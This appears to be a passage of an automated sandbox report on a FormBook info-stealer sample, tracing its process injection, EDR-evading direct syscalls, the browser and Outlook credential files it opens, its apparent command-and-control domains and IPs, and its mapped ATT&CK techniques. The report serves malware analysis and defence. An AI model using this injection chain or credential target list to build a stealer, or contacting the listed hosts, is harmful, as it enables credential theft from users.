                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031649D0 mov eax, dword ptr fs:[00000030h]2_2_031649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA9D3 mov eax, dword ptr fs:[00000030h]2_2_031FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C69C0 mov eax, dword ptr fs:[00000030h]2_2_031C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031629F9 mov eax, dword ptr fs:[00000030h]2_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031629F9 mov eax, dword ptr fs:[00000030h]2_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE9E0 mov eax, dword ptr fs:[00000030h]2_2_031BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC810 mov eax, dword ptr fs:[00000030h]2_2_031BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov ecx, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A830 mov eax, dword ptr fs:[00000030h]2_2_0316A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D483A mov eax, dword ptr fs:[00000030h]2_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D483A mov eax, dword ptr fs:[00000030h]2_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160854 mov eax, dword ptr fs:[00000030h]2_2_03160854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134859 mov eax, dword ptr fs:[00000030h]2_2_03134859
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003E80A9
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003BA124 SetUnhandledExceptionFilter,0_2_003BA124
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003BA155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 6040Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeThread APC queued: target process: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 25B6008Jump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003E87B1 LogonUserW,0_2_003E87B1
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00393B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00393B3A
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003948D7
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F4C27 mouse_event,0_2_003F4C27
                Source: C:\Users\user\Desktop\5by4QM3v89.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5by4QM3v89.exe"Jump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003E7CAF
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003E874B
                Source: 5by4QM3v89.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 5by4QM3v89.exe, rVnDkmUdXXPrwb.exe, 00000004.00000002.2624488084.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000000.1757955572.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906967625.0000000001011000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: rVnDkmUdXXPrwb.exe, 00000004.00000002.2624488084.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000000.1757955572.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906967625.0000000001011000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: rVnDkmUdXXPrwb.exe, 00000004.00000002.2624488084.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000000.1757955572.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906967625.0000000001011000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: rVnDkmUdXXPrwb.exe, 00000004.00000002.2624488084.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000000.1757955572.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906967625.0000000001011000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B862B cpuid 0_2_003B862B
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_003C4E87
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003D1E06 GetUserNameW,0_2_003D1E06
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_003C3F3A
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003949A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.26a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.26a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: 5by4QM3v89.exeBinary or memory string: WIN_81
                Source: 5by4QM3v89.exeBinary or memory string: WIN_XP
                Source: 5by4QM3v89.exeBinary or memory string: WIN_XPe
                Source: 5by4QM3v89.exeBinary or memory string: WIN_VISTA
                Source: 5by4QM3v89.exeBinary or memory string: WIN_7
                Source: 5by4QM3v89.exeBinary or memory string: WIN_8
                Source: 5by4QM3v89.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.26a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.26a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00406283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00406283
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00406747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00406747
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C7AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,0_2_003C7AA1
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588594 Sample: 5by4QM3v89.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 28 www.athanasopoulos.xyz 2->28 30 www.happytrail.life 2->30 32 6 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 5by4QM3v89.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 rVnDkmUdXXPrwb.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 control.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 rVnDkmUdXXPrwb.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 athanasopoulos.xyz 84.32.84.32, 49984, 49985, 49986 NTT-LT-ASLT Lithuania 22->34 36 www.happytrail.life 199.192.23.123, 49976, 49977, 49978 NAMECHEAP-NETUS United States 22->36 38 3 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                5by4QM3v89.exe64%VirustotalBrowse
                5by4QM3v89.exe66%ReversingLabsWin32.Trojan.AutoitInject
                5by4QM3v89.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
